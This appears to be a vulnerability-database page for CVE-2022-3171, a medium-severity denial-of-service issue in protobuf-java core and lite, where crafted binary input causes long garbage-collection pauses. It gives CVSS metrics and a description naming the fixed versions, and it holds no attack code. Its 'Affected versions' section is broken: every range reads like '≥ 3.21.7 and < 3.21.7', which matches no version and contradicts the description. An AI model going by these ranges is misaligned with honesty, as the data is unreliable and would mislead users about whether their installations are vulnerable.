CVE-2022-3171 MEDIUM

CVE-2022-3171: Memory handling vulnerability in ProtocolBuffers Java core and lite

Vendor Google Llc

Product Protocolbuffers

Weakness CWE-20 · Input validation

Published October 12, 2022

Last update April 21, 2025

View on NVD All CVEs

CVSS base score

4.3/10

Attack vector Adjacent

Attack complexity Low

Privileges required None

User interaction None

Confidentiality None

Integrity None

CVSS vector

CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

What the vulnerability does

Description

A parsing issue with binary data in protobuf-java core and lite versions prior to 3.21.7, 3.20.3, 3.19.6 and 3.16.3 can lead to a denial of service attack. Inputs containing multiple instances of non-repeated embedded messages with repeated or unknown fields causes objects to be converted back-n-forth between mutable and immutable forms, resulting in potentially long garbage collection pauses. We recommend updating to the versions mentioned above.

Key dates

Disclosure timeline

October 12, 2022 CVE published

April 21, 2025 Record updated

Identifiers

CVE CVE-2022-3171

CWE CWE-20

CVSS 4.3 / MEDIUM

Affected versions

Vendor Google Llc

Product Protocolbuffers

Affected ≥ 3.21.7 and < 3.21.7

Vendor Google Llc

Product Protocolbuffers

Affected ≥ 3.20.3 and < 3.20.3

Vendor Google Llc

Product Protocolbuffers

Affected ≥ 3.19.6 and < 3.19.6

Vendor Google Llc

Product Protocolbuffers

Affected ≥ 3.16.3 and < 3.16.3